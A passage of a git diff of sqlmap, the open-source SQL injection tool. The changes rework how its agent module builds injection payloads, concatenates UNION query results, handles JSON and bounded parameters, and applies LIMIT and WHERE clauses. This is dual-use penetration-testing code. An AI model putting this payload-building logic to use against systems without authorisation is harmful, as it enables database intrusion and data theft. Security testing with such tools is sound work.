(r"\w+\Z", r"[^\"'><]+\Z", r"[^ ]+\Z")))[0].group(0) origValue = origValue[origValue.rfind('/') + 1:] for char in ('?', '=', ':'): if char in origValue: @@ -114,7 +121,7 @@ class Agent(object): elif place == PLACE.CUSTOM_HEADER: paramString = origValue origValue = origValue.split(CUSTOM_INJECTION_MARK_CHAR)[0] - origValue = origValue[origValue.index(',') + 1:] + origValue = origValue[origValue.find(',') + 1:] match = re.search(r"([^;]+)=(?P[^;]+);?\Z", origValue) if match: origValue = match.group("value") @@ -124,9 +131,6 @@ class Agent(object): if header.upper() == HTTP_HEADER.AUTHORIZATION.upper(): origValue = origValue.split(' ')[-1].split(':')[-1] - if conf.prefix: - value = origValue - if value is None: if where == PAYLOAD.WHERE.ORIGINAL: value = origValue @@ -163,6 +167,9 @@ class Agent(object): newValue = newValue.replace(CUSTOM_INJECTION_MARK_CHAR, REPLACEMENT_MARKER) retVal = paramString.replace(_, self.addPayloadDelimiters(newValue)) retVal = retVal.replace(CUSTOM_INJECTION_MARK_CHAR, "").replace(REPLACEMENT_MARKER, CUSTOM_INJECTION_MARK_CHAR) + elif BOUNDED_INJECTION_MARKER in paramDict[parameter]: + _ = "%s%s" % (origValue, BOUNDED_INJECTION_MARKER) + retVal = "%s=%s" % (re.sub(r" (\#\d\*|\(.+\))\Z", "", parameter), paramString.replace(_, self.addPayloadDelimiters(newValue))) elif place in (PLACE.USER_AGENT, PLACE.REFERER, PLACE.HOST): retVal = paramString.replace(origValue, self.addPayloadDelimiters(newValue)) else: @@ -187,12 +194,12 @@ class Agent(object): if origValue: regex = r"(\A|\b)%s=%s%s" % (re.escape(parameter), re.escape(origValue), r"(\Z|\b)" if origValue[-1].isalnum() else "") - retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(regex, "%s=%s" % (parameter, self.addPayloadDelimiters(newValue)), paramString) else: - retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s(\Z|%s|%s|\s)" % (re.escape(parameter), re.escape(origValue), DEFAULT_GET_POST_DELIMITER, DEFAULT_COOKIE_DELIMITER), "%s=%s\g<2>" % (parameter, self.addPayloadDelimiters(newValue)), paramString) if retVal == paramString and urlencode(parameter) != parameter: - retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue.replace("\\", "\\\\"))), paramString) + retVal = _(r"(\A|\b)%s=%s" % (re.escape(urlencode(parameter)), re.escape(origValue)), "%s=%s" % (urlencode(parameter), self.addPayloadDelimiters(newValue)), paramString) if retVal: retVal = retVal.replace(BOUNDARY_BACKSLASH_MARKER, '\\') @@ -231,7 +238,7 @@ class Agent(object): # If we are replacing () the parameter original value with # our payload do not prepend with the prefix - if where == PAYLOAD.WHERE.REPLACE and not conf.prefix: + if where == PAYLOAD.WHERE.REPLACE: query = "" # If the technique is stacked queries () do not put a space @@ -275,7 +282,7 @@ class Agent(object): where = kb.injection.data[kb.technique].where if where is None else where comment = kb.injection.data[kb.technique].comment if comment is None else comment - if Backend.getIdentifiedDbms() == DBMS.ACCESS and comment == GENERIC_SQL_COMMENT: + if Backend.getIdentifiedDbms() == DBMS.ACCESS and any((comment or "").startswith(_) for _ in ("--", "[GENERIC_SQL_COMMENT]")): comment = queries[DBMS.ACCESS].comment.query if comment is not None: @@ -289,7 +296,7 @@ class Agent(object): elif suffix and not comment: expression += suffix.replace('\\', BOUNDARY_BACKSLASH_MARKER) - return re.sub(r"(?s);\W*;", ";", expression) + return re.sub(r";\W*;", ";", expression) def cleanupPayload(self, payload, origValue=None): if payload is None: @@ -298,7 +305,7 @@ class Agent(object): _ = ( ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\ ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\ - ("[HASH_REPLACE]", kb.chars.hash_), + ("[HASH_REPLACE]", kb.chars.hash_), ("[GENERIC_SQL_COMMENT]", GENERIC_SQL_COMMENT) ) payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload) @@ -308,8 +315,9 @@ class Agent(object): for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, randomStr()) - if origValue is not None: - payload = payload.replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) + if origValue is not None and "[ORIGVALUE]" in payload: + origValue = getUnicode(origValue) + payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[INFERENCE]" in payload: if Backend.getIdentifiedDbms() is not None: @@ -337,7 +345,7 @@ class Agent(object): """ if payload: - payload = payload.replace("[SLEEPTIME]", str(conf.timeSec)) + payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec)) return payload @@ -445,7 +453,7 @@ class Agent(object): @rtype: C{str} """ - if not Backend.getDbms(): + if not Backend.getIdentifiedDbms(): return fields if fields.startswith("(CASE") or fields.startswith("(IIF") or fields.startswith("SUBSTR") or fields.startswith("MID(") or re.search(r"\A'[^']+'\Z", fields): @@ -480,7 +488,7 @@ class Agent(object): @rtype: C{str} """ - prefixRegex = r"(?:\s+(?:FIRST|SKIP)\s+\d+)*" + prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*" fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I) fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I) fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I) @@ -496,27 +504,33 @@ class Agent(object): if not _: fieldsSelectFrom = None + fieldsToCastStr = fieldsNoSelect + if fieldsSubstr: fieldsToCastStr = query elif fieldsMinMaxstr: - fieldsToCastStr = fieldsMinMaxstr.groups()[0] + fieldsToCastStr = fieldsMinMaxstr.group(1) elif fieldsExists: - fieldsToCastStr = fieldsSelect.groups()[0] + if fieldsSelect: + fieldsToCastStr = fieldsSelect.group(1) elif fieldsSelectTop: - fieldsToCastStr = fieldsSelectTop.groups()[0] + fieldsToCastStr = fieldsSelectTop.group(1) elif fieldsSelectRownum: - fieldsToCastStr = fieldsSelectRownum.groups()[0] + fieldsToCastStr = fieldsSelectRownum.group(1) elif fieldsSelectDistinct: - fieldsToCastStr = fieldsSelectDistinct.groups()[0] + if Backend.getDbms() in (DBMS.HSQLDB,): + fieldsToCastStr = fieldsNoSelect + else: + fieldsToCastStr = fieldsSelectDistinct.group(1) elif fieldsSelectCase: - fieldsToCastStr = fieldsSelectCase.groups()[0] + fieldsToCastStr = fieldsSelectCase.group(1) elif fieldsSelectFrom: fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr) elif fieldsSelect: - fieldsToCastStr = fieldsSelect.groups()[0] - else: - fieldsToCastStr = fieldsNoSelect + fieldsToCastStr = fieldsSelect.group(1) + + fieldsToCastStr = fieldsToCastStr or "" # Function if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr: @@ -584,7 +598,7 @@ class Agent(object): else: return query - if Backend.getIdentifiedDbms() in (DBMS.MYSQL,): + if Backend.isDbms(DBMS.MYSQL): if fieldsExists: concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.chars.start, 1) concatenatedQuery += ",'%s')" % kb.chars.stop @@ -611,6 +625,7 @@ class Agent(object): concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = re.sub(r"('%s'\|\|)(.+)(%s)" % (kb.chars.start, re.escape(castedFields)), "\g<2>\g<1>\g<3>", concatenatedQuery) elif fieldsSelect: concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) concatenatedQuery += "||'%s'" % kb.chars.stop @@ -656,24 +671,23 @@ class Agent(object): concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop) else: - warnMsg = "applying generic concatenation with double pipes ('||')" + warnMsg = "applying generic concatenation (CONCAT)" singleTimeWarnMessage(warnMsg) if fieldsExists: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) - concatenatedQuery += "||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsSelectCase: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1) - concatenatedQuery += ")||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsSelectFrom: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) _ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM ")) - concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:]) + concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:]) elif fieldsSelect: - concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1) - concatenatedQuery += "||'%s'" % kb.chars.stop + concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1) + concatenatedQuery += "),'%s')" % kb.chars.stop elif fieldsNoSelect: - concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop) + concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop) return concatenatedQuery @@ -710,8 +724,11 @@ class Agent(object): if conf.uFrom: fromTable = " FROM %s" % conf.uFrom - else: - fromTable = fromTable or FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "") + elif not fromTable: + if kb.tableFrom: + fromTable = " FROM %s" % kb.tableFrom + else: + fromTable = FROM_DUMMY_TABLE.get(Backend.getIdentifiedDbms(), "") if query.startswith("SELECT "): query = query[len("SELECT "):] @@ -744,6 +761,9 @@ class Agent(object): intoRegExp = intoRegExp.group(1) query = query[:query.index(intoRegExp)] + position = 0 + char = NULL + for element in xrange(0, count): if element > 0: unionQuery += ',' @@ -838,7 +858,7 @@ class Agent(object): if expression.find(queries[Backend.getIdentifiedDbms()].limitstring.query) > 0: _ = expression.index(queries[Backend.getIdentifiedDbms()].limitstring.query) else: - _ = expression.index("LIMIT ") + _ = re.search(r"\bLIMIT\b", expression, re.I).start() expression = expression[:_] elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE): @@ -881,12 +901,30 @@ class Agent(object): fromIndex = limitedQuery.index(" FROM ") untilFrom = limitedQuery[:fromIndex] fromFrom = limitedQuery[fromIndex + 1:] - orderBy = False + orderBy = None if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) limitedQuery += " %s" % limitStr + elif Backend.isDbms(DBMS.HSQLDB): + match = re.search(r"ORDER BY [^ ]+", limitedQuery) + if match: + limitedQuery = re.sub(r"\s*%s\s*" % match.group(0), " ", limitedQuery).strip() + limitedQuery += " %s" % match.group(0) + + if query.startswith("SELECT "): + limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1) + limitedQuery = limitedQuery.replace("SELECT ", "SELECT %s " % limitStr, 1) + else: + limitStr = queries[Backend.getIdentifiedDbms()].limit.query2 % (1, num) + limitedQuery += " %s" % limitStr + + if not match: + match = re.search(r"%s\s+(\w+)" % re.escape(limitStr), limitedQuery) + if match: + orderBy = " ORDER BY %s" % match.group(1) + elif Backend.isDbms(DBMS.FIREBIRD): limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num + 1, num + 1) limitedQuery += " %s" % limitStr @@ -903,7 +941,7 @@ class Agent(object): else: limitedQuery = "%s FROM (SELECT %s,%s" % (untilFrom, ','.join(f for f in field), limitStr) - limitedQuery = limitedQuery % fromFrom + limitedQuery = safeStringFormat(limitedQuery, (fromFrom,)) limitedQuery += "=%d" % (num + 1) elif Backend.isDbms(DBMS.MSSQL): @@ -964,12 +1002,13 @@ class Agent(object): def forgeQueryOutputLength(self, expression): lengthQuery = queries[Backend.getIdentifiedDbms()].length.query - select = re.search("\ASELECT\s+", expression, re.I) - selectTopExpr = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) + select = re.search(r"\ASELECT\s+", expression, re.I) + selectTopExpr = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", expression, re.I) + selectMinMaxExpr = re.search(r"\ASELECT\s+(MIN|MAX)\(.+?\)\s+FROM", expression, re.I) _, _, _, _, _, _, fieldsStr, _ = self.getFields(expression) - if selectTopExpr: + if selectTopExpr or selectMinMaxExpr: lengthExpr = lengthQuery % ("(%s)" % expression) elif select: lengthExpr = expression.replace(fieldsStr, lengthQuery % fieldsStr, 1) @@ -1033,7 +1072,7 @@ class Agent(object): """ _ = re.escape(PAYLOAD_DELIMITER) - return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value + return re.sub("(?s)(%s.*?%s)" % (_, _), ("%s%s%s" % (PAYLOAD_DELIMITER, getUnicode(payload), PAYLOAD_DELIMITER)).replace("\\", r"\\"), value) if value else value def runAsDBMSUser(self, query): if conf.dbmsCred and "Ad Hoc Distributed Queries" not in query: @@ -1041,5 +1080,20 @@ class Agent(object): return query + def whereQuery(self, query): + if conf.dumpWhere and query: + prefix, suffix = query.split(" ORDER BY ") if " ORDER BY " in query else (query, "") + + if "%s)" % conf.tbl.upper() in prefix.upper(): + prefix = re.sub(r"(?i)%s\)" % re.escape(conf.tbl), "%s WHERE %s)" % (conf.tbl, conf.dumpWhere), prefix) + elif re.search(r"(?i)\bWHERE\b", prefix): + prefix += " AND %s" % conf.dumpWhere + else: + prefix += " WHERE %s" % conf.dumpWhere + + query = "%s ORDER BY %s" % (prefix, suffix) if suffix else prefix + + return query + # SQL agent agent = Agent() diff --git a/lib/core/bigarray.py b/lib/core/bigarray.py index 0e42433d8..d77613fb3 100644 --- a/lib/core/bigarray.py +++ b/lib/core/bigarray.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -15,6 +15,7 @@ import os import sys import tempfile +from lib.core.enums import MKSTEMP_PREFIX from lib.core.exception import SqlmapSystemException from lib.core.settings import BIGARRAY_CHUNK_SIZE @@ -79,7 +80,7 @@ class BigArray(list): self.chunks[-1] = pickle.load(fp) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg return self.chunks[-1].pop() @@ -91,7 +92,7 @@ class BigArray(list): def _dump(self, chunk): try: - handle, filename = tempfile.mkstemp() + handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.BIG_ARRAY) self.filenames.add(filename) os.close(handle) with open(filename, "w+b") as fp: @@ -99,7 +100,7 @@ class BigArray(list): return filename except (OSError, IOError), ex: errMsg = "exception occurred while storing data " - errMsg += "to a temporary file ('%s'). Please " % ex + errMsg += "to a temporary file ('%s'). Please " % ex.message errMsg += "make sure that there is enough disk space left. If problem persists, " errMsg += "try to set environment variable 'TEMP' to a location " errMsg += "writeable by the current user" @@ -115,7 +116,7 @@ class BigArray(list): self.cache = Cache(index, pickle.load(fp), False) except IOError, ex: errMsg = "exception occurred while retrieving data " - errMsg += "from a temporary file ('%s')" % ex + errMsg += "from a temporary file ('%s')" % ex.message raise SqlmapSystemException, errMsg def __getstate__(self): diff --git a/lib/core/common.py b/lib/core/common.py old mode 100755 new mode 100644 index b72066c64..2446dcd63 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -23,8 +23,10 @@ import random import re import socket import string +import subprocess import sys import tempfile +import threading import time import urllib import urllib2 @@ -37,8 +39,6 @@ from StringIO import StringIO from difflib import SequenceMatcher from math import sqrt from optparse import OptionValueError -from subprocess import PIPE -from subprocess import Popen as execute from xml.dom import minidom from xml.sax import parse from xml.sax import SAXParseException @@ -72,6 +72,8 @@ from lib.core.enums import EXPECTED from lib.core.enums import HEURISTIC_TEST from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX +from lib.core.enums import OPTION_TYPE from lib.core.enums import OS from lib.core.enums import PLACE from lib.core.enums import PAYLOAD @@ -86,10 +88,12 @@ from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException from lib.core.log import LOGGER_HANDLER from lib.core.optiondict import optDict from lib.core.settings import BANNER from lib.core.settings import BOLD_PATTERNS +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import BRUTE_DOC_ROOT_PREFIXES from lib.core.settings import BRUTE_DOC_ROOT_SUFFIXES from lib.core.settings import BRUTE_DOC_ROOT_TARGET_MARK @@ -101,6 +105,7 @@ from lib.core.settings import DEFAULT_MSSQL_SCHEMA from lib.core.settings import DUMMY_USER_INJECTION from lib.core.settings import DYNAMICITY_MARK_LENGTH from lib.core.settings import ERROR_PARSING_REGEXES +from lib.core.settings import FILE_PATH_REGEXES from lib.core.settings import FORCE_COOKIE_EXPIRATION_TIME from lib.core.settings import FORM_SEARCH_REGEX from lib.core.settings import GENERIC_DOC_ROOT_DIRECTORY_NAMES @@ -109,12 +114,14 @@ from lib.core.settings import GITHUB_REPORT_OAUTH_TOKEN from lib.core.settings import GOOGLE_ANALYTICS_COOKIE_PREFIX from lib.core.settings import HASHDB_MILESTONE_VALUE from lib.core.settings import HOST_ALIASES +from lib.core.settings import IGNORE_SAVE_OPTIONS from lib.core.settings import INFERENCE_UNKNOWN_CHAR from lib.core.settings import INVALID_UNICODE_CHAR_FORMAT from lib.core.settings import IP_ADDRESS_REGEX from lib.core.settings import ISSUES_PAGE from lib.core.settings import IS_WIN from lib.core.settings import LARGE_OUTPUT_THRESHOLD +from lib.core.settings import LOCALHOST from lib.core.settings import MIN_ENCODED_LEN_CHECK from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import MIN_VALID_DELAYED_RESPONSE @@ -127,14 +134,17 @@ from lib.core.settings import PARTIAL_VALUE_MARKER from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PLATFORM from lib.core.settings import PRINTABLE_CHAR_REGEX +from lib.core.settings import PUSH_VALUE_EXCEPTION_RETRY_COUNT from lib.core.settings import PYVERSION from lib.core.settings import REFERER_ALIASES from lib.core.settings import REFLECTED_BORDER_REGEX from lib.core.settings import REFLECTED_MAX_REGEX_PARTS from lib.core.settings import REFLECTED_REPLACEMENT_REGEX +from lib.core.settings import REFLECTED_REPLACEMENT_TIMEOUT from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import REFLECTIVE_MISS_THRESHOLD from lib.core.settings import SENSITIVE_DATA_REGEX +from lib.core.settings import SENSITIVE_OPTIONS from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import TEXT_TAG_REGEX from lib.core.settings import TIME_STDEV_COEFF @@ -149,6 +159,7 @@ from lib.core.threads import getCurrentThreadData from lib.utils.sqlalchemy import _sqlalchemy from thirdparty.clientform.clientform import ParseResponse from thirdparty.clientform.clientform import ParseError +from thirdparty.colorama.initialise import init as coloramainit from thirdparty.magic import magic from thirdparty.odict.odict import OrderedDict from thirdparty.termcolor.termcolor import colored @@ -202,7 +213,7 @@ class Format(object): if versions is None and Backend.getVersionList(): versions = Backend.getVersionList() - return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(v for v in versions)) + return Backend.getDbms() if versions is None else "%s %s" % (Backend.getDbms(), " and ".join(filter(None, versions))) @staticmethod def getErrorParsedDBMSes(): @@ -261,7 +272,7 @@ class Format(object): infoApi = {} if info and "type" in info: - if hasattr(conf, "api"): + if conf.api: infoApi["%s operating system" % target] = info else: infoStr += "%s operating system: %s" % (target, Format.humanize(info["type"])) @@ -279,12 +290,12 @@ class Format(object): infoStr += " (%s)" % Format.humanize(info["codename"]) if "technology" in info: - if hasattr(conf, "api"): + if conf.api: infoApi["web application technology"] = Format.humanize(info["technology"], ", ") else: infoStr += "\nweb application technology: %s" % Format.humanize(info["technology"], ", ") - if hasattr(conf, "api"): + if conf.api: return infoApi else: return infoStr.lstrip() @@ -300,7 +311,7 @@ class Backend: # Little precaution, in theory this condition should always be false elif kb.dbms is not None and kb.dbms != dbms: - warnMsg = "there seems to be a high probability that " + warnMsg = "there appears to be a high probability that " warnMsg += "this could be a false positive case" logger.warn(warnMsg) @@ -311,12 +322,14 @@ class Backend: msg += "correct [%s (default)/%s] " % (kb.dbms, dbms) while True: - _ = readInput(msg, default=kb.dbms) + choice = readInput(msg, default=kb.dbms) - if aliasToDbmsEnum(_) == kb.dbms: + if aliasToDbmsEnum(choice) == kb.dbms: + kb.dbmsVersion = [] + kb.resolutionDbms = kb.dbms break - elif aliasToDbmsEnum(_) == dbms: - kb.dbms = aliasToDbmsEnum(_) + elif aliasToDbmsEnum(choice) == dbms: + kb.dbms = aliasToDbmsEnum(choice) break else: warnMsg = "invalid value" @@ -369,12 +382,12 @@ class Backend: msg += "correct [%s (default)/%s] " % (kb.os, os) while True: - _ = readInput(msg, default=kb.os) + choice = readInput(msg, default=kb.os) - if _ == kb.os: + if choice == kb.os: break - elif _ == os: - kb.os = _.capitalize() + elif choice == os: + kb.os = choice.capitalize() break else: warnMsg = "invalid value" @@ -408,10 +421,10 @@ class Backend: msg += "\n[2] 64-bit" while True: - _ = readInput(msg, default='1') + choice = readInput(msg, default='1') - if isinstance(_, basestring) and _.isdigit() and int(_) in (1, 2): - kb.arch = 32 if int(_) == 1 else 64 + if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + kb.arch = 32 if int(choice) == 1 else 64 break else: warnMsg = "invalid value. Valid values are 1 and 2" @@ -456,6 +469,8 @@ class Backend: if not kb: pass + elif not kb.get("testMode") and conf.get("dbmsHandler") and getattr(conf.dbmsHandler, "_dbms", None): + dbms = conf.dbmsHandler._dbms elif Backend.getForcedDbms() is not None: dbms = Backend.getForcedDbms() elif Backend.getDbms() is not None: @@ -471,15 +486,17 @@ class Backend: @staticmethod def getVersion(): - if len(kb.dbmsVersion) > 0: - return kb.dbmsVersion[0] + versions = filter(None, flattenValue(kb.dbmsVersion)) + if not isNoneValue(versions): + return versions[0] else: return None @staticmethod def getVersionList(): - if len(kb.dbmsVersion) > 0: - return kb.dbmsVersion + versions = filter(None, flattenValue(kb.dbmsVersion)) + if not isNoneValue(versions): + return versions else: return None @@ -504,10 +521,9 @@ class Backend: # Comparison methods @staticmethod def isDbms(dbms): - if Backend.getDbms() is not None: - return Backend.getDbms() == aliasToDbmsEnum(dbms) - else: - return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms) + if not kb.get("testMode") and all((Backend.getDbms(), Backend.getIdentifiedDbms())) and Backend.getDbms() != Backend.getIdentifiedDbms(): + singleTimeWarnMessage("identified ('%s') and fingerprinted ('%s') DBMSes differ. If you experience problems in enumeration phase please rerun with '--flush-session'" % (Backend.getIdentifiedDbms(), Backend.getDbms())) + return Backend.getIdentifiedDbms() == aliasToDbmsEnum(dbms) @staticmethod def isDbmsWithin(aliases): @@ -575,18 +591,18 @@ def paramToDict(place, parameters=None): if not conf.multipleTargets and not (conf.csrfToken and parameter == conf.csrfToken): _ = urldecode(testableParameters[parameter], convall=True) if (_.endswith("'") and _.count("'") == 1 - or re.search(r'\A9{3,}', _) or re.search(DUMMY_USER_INJECTION, _))\ + or re.search(r'\A9{3,}', _) or re.search(r'\A-\d+\Z', _) or re.search(DUMMY_USER_INJECTION, _))\ and not parameter.upper().startswith(GOOGLE_ANALYTICS_COOKIE_PREFIX): warnMsg = "it appears that you have provided tainted parameter values " - warnMsg += "('%s') with most probably leftover " % element + warnMsg += "('%s') with most likely leftover " % element warnMsg += "chars/statements from manual SQL injection test(s). " warnMsg += "Please, always use only valid parameter values " warnMsg += "so sqlmap could be able to run properly" logger.warn(warnMsg) message = "are you really sure that you want to continue (sqlmap could have problems)? [y/N] " - test = readInput(message, default="N") - if test[0] not in ("y", "Y"): + + if not readInput(message, default='N', boolean=True): raise SqlmapSilentQuitException elif not _: warnMsg = "provided value for parameter '%s' is empty. " % parameter @@ -594,27 +610,80 @@ def paramToDict(place, parameters=None): warnMsg += "so sqlmap could be able to run properly" logger.warn(warnMsg) - if conf.testParameter and not testableParameters: - paramStr = ", ".join(test for test in conf.testParameter) + if place in (PLACE.POST, PLACE.GET): + for regex in (r"\A((?:<[^>]+>)+\w+)((?:<[^>]+>)+)\Z", r"\A([^\w]+.*\w+)([^\w]+)\Z"): + match = re.search(regex, testableParameters[parameter]) + if match: + try: + candidates = OrderedDict() - if len(conf.testParameter) > 1: - warnMsg = "provided parameters '%s' " % paramStr - warnMsg += "are not inside the %s" % place - logger.warn(warnMsg) - else: - parameter = conf.testParameter[0] + def walk(head, current=None): + if current is None: + current = head + if isListLike(current): + for _ in current: + walk(head, _) + elif isinstance(current, dict): + for key in current.keys(): + value = current[key] + if isinstance(value, (list, tuple, set, dict)): + if value: + walk(head, value) + elif isinstance(value, (bool, int, float, basestring)): + original = current[key] + if isinstance(value, bool): + current[key] = "%s%s" % (str(value).lower(), BOUNDED_INJECTION_MARKER) + else: + current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER) + candidates["%s (%s)" % (parameter, key)] = re.sub("(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters) + current[key] = original - if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True): - debugMsg = "provided parameter '%s' " % paramStr - debugMsg += "is not inside the %s" % place - logger.debug(debugMsg) + deserialized = json.loads(testableParameters[parameter]) + walk(deserialized) - elif len(conf.testParameter) != len(testableParameters.keys()): - for parameter in conf.testParameter: - if parameter not in testableParameters: - debugMsg = "provided parameter '%s' " % parameter - debugMsg += "is not inside the %s" % place - logger.debug(debugMsg) + if candidates: + message = "it appears that provided value for %s parameter '%s' " % (place, parameter) + message += "is JSON deserializable. Do you want to inject inside? [y/N] " + + if not readInput(message, default='N', boolean=True): + del testableParameters[parameter] + testableParameters.update(candidates) + break + except (KeyboardInterrupt, SqlmapUserQuitException): + raise + except Exception: + pass + + _ = re.sub(regex, "\g<1>%s\g<%d>" % (CUSTOM_INJECTION_MARK_CHAR, len(match.groups())), testableParameters[parameter]) + message = "it appears that provided value for %s parameter '%s' " % (place, parameter) + message += "has boundaries. Do you want to inject inside? ('%s') [y/N] " % getUnicode(_) + + if readInput(message, default='N', boolean=True): + testableParameters[parameter] = re.sub(regex, "\g<1>%s\g<2>" % BOUNDED_INJECTION_MARKER, testableParameters[parameter]) + break + + if conf.testParameter: + if not testableParameters: + paramStr = ", ".join(test for test in conf.testParameter) + + if len(conf.testParameter) > 1: + warnMsg = "provided parameters '%s' " % paramStr + warnMsg += "are not inside the %s" % place + logger.warn(warnMsg) + else: + parameter = conf.testParameter[0] + + if not intersect(USER_AGENT_ALIASES + REFERER_ALIASES + HOST_ALIASES, parameter, True): + debugMsg = "provided parameter '%s' " % paramStr + debugMsg += "is not inside the %s" % place + logger.debug(debugMsg) + + elif len(conf.testParameter) != len(testableParameters.keys()): + for parameter in conf.testParameter: + if parameter not in testableParameters: + debugMsg = "provided parameter '%s' " % parameter + debugMsg += "is not inside the %s" % place + logger.debug(debugMsg) if testableParameters: for parameter, value in testableParameters.items(): @@ -624,7 +693,7 @@ def paramToDict(place, parameters=None): decoded = value.decode(encoding) if len(decoded) > MIN_ENCODED_LEN_CHECK and all(_ in string.printable for _ in decoded): warnMsg = "provided parameter '%s' " % parameter - warnMsg += "seems to be '%s' encoded" % encoding + warnMsg += "appears to be '%s' encoded" % encoding logger.warn(warnMsg) break except: @@ -634,8 +703,6 @@ def paramToDict(place, parameters=None): def 